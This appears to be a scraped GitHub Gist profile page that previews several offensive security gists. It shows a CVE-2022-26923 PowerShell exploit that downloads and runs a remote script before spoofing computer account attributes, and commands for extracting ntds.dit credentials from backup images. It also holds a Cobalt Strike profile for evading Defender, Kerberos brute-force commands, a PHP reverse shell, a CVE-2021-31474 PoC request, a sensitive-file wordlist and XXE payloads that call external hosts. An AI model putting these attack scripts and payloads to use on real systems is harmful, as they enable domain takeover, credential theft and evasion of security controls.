Skip to content

Instantly share code, notes, and snippets.

View icheernoom's full-sized avatar
😆
Focusing

ICheer_No0M icheernoom

😆
Focusing
29 followers · 33 following
View GitHub Profile
@Wh04m1001
Wh04m1001 / CVE-2022–26923.ps1
Last active June 23, 2023 10:09
iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing )
Import-ActiveDirectory
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose
#in my testing i had to set dnshostname to $null first
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local
@zimnyaa
zimnyaa / vhdx-on-smb-share.sh
Created January 19, 2022 12:02
Unpack .vhdx and decrypt ntds.dit (often used for backups and can be found on open SMB shares)
# runs on kali out-of-the-box
# this is not a ready-made script, more like a collection of commands
# QEMU mounting a drive
modprobe nbd max_part=16
qemu-nbd -c /dev/nbd0 filename.vhdx
# look for the second partition, usually where the FS resides
fdisk -l /dev/nbd0
@tothi
tothi / minimal-defender-bypass.profile
Last active April 1, 2025 22:38
Minimal Cobalt Strike C2 Profile for Bypassing Defender
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works
set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";
stage {
set allocator "MapViewOfFile";
set name "notevil.dll";
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / kerberos_attacks_cheatsheet.md
Created December 13, 2021 12:58 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@leonjza
leonjza / README.md
Last active October 12, 2022 19:40
A PHP eval() reverse shell.

php eval shell

A reverse shell that lets you evaluate PHP.
This is not an OS command reverse shell per-se but you could eval a function like system("id") for that if you wanted to.

Useful to poison an existing PHP file and explore the currently loaded environment.

example

@testanull
testanull / PoC_CVE-2021–31474.json
Created May 25, 2021 10:20
POST /api/Action/TestAction HTTP/1.1
Host: <target>
Content-Length: 3978
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: <token>
X-Requested-With: XMLHttpRequest
ViewLimitationID: 0
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Cookie: <cookie>
@MHaggis
MHaggis / malleable_c2_profiles
Last active July 1, 2024 18:55
spawnto
https://raw.githubusercontent.com/kphongagsorn/c2-profiles/29fe50eaad655ddd0028fca06a9c7785e3ffaf41/amazon.profile
https://raw.githubusercontent.com/kvcallfield/Cobalt-Strike-C2-profiles/cae44634d57c0d8a099e50f6d4e9b73acaaab9d6/amazon2.profile
https://raw.githubusercontent.com/KevinCooper/24AF-CyberChallenge/67f531777f7912c7129f633f43e06fba79c5f3e2/CobaltStrike/cobalt.profile
https://raw.githubusercontent.com/webcoderz/agressor-scripts-/950064776853cf4dd7403d0f75b5306fe275fcc3/Malleable-C2-Profiles-master/APT/meterpreter.profile
https://raw.githubusercontent.com/hadesangel/Malleable-C2-Profiles/390937aec01e0bcdaf23312277e96e57ac925f7b/APT/meterpreter.profile
https://raw.githubusercontent.com/ianxtianxt/Malleable-C2-Profiles/07fd3b45c4166c9aecdcfa54cddc905c22f6ff85/APT/meterpreter.profile
https://raw.githubusercontent.com/seclib/Malleable-C2-Profiles/390937aec01e0bcdaf23312277e96e57ac925f7b/APT/meterpreter.profile
https://raw.githubusercontent.com/rsmudge/Malleable-C2-Profiles/390937aec01e0bcdaf2331227
@jonlabelle
jonlabelle / ldap_search_filter_cheatsheet.md
Last active April 15, 2025 16:07
LDAP Search Filter Cheatsheet
@nullenc0de
nullenc0de / interesting_dirsearch.txt
Last active October 22, 2023 11:54
uploads/affwp-debug.log
certs/server.key
server.key
.CSV
.PDF
.README.md.bud
.action
.actionScriptProperties
.angular-cli.json
.apport-ignore.xml
@honoki
honoki / xxe-payloads.txt
Last active November 11, 2024 17:01
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y